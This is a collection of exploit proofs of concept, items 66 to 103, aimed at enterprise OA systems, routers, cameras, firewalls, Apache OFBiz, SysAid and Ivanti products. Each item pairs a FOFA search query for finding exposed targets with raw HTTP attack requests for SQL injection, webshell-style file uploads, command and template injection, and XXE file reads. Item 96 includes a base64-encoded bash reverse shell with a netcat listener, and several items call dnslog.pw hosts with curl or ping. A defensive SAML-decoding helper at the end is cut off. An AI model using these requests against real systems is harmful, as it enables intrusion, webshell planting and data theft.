66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the file written, dir sets the path it is written to, and fileType sets the file type
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--


The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD


71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x


76. 新开普掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}


GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x



77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--


GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>


GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"


POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"



POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}


85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla (哥斯拉) webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. 安恒明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--


/jfhatuwe.php

88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close


/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+


90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive



92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD


93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--



GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36



95. Apache-OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
    <params>
      <param>
      <value>
      <struct>
       <member>
          <name>test</name>
          <value>
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable>
          </value>
      </member>
      </struct>
      </value>
    </param>
    </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast盈可视 HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the following XML (decoded):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
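Added example (mine, not from the original post, watchTowr or Ivanti): a small Python helper that decodes a SAMLRequest value such as the one above and reports the XXE indicators a defender should look for (an inline DOCTYPE, a SYSTEM/PUBLIC entity, a parameter entity). The captured value is copied from the request above; the benign AuthnRequest is constructed. As a generalisation beyond this POC it also accepts the deflate-compressed form that the SAML Redirect binding uses, so the same function can be pointed at either binding.

```python
import base64
import re
import zlib
from urllib.parse import unquote

# The SAMLRequest form value exactly as it appears in the request above.
CAPTURED_SAML_REQUEST = "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="

# A constructed, harmless AuthnRequest used only for contrast (not from the page).
BENIGN_XML = '<?xml version="1.0"?><samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1"/>'

_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
_EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+%?\s*\S+\s+(SYSTEM|PUBLIC)\b", re.I)
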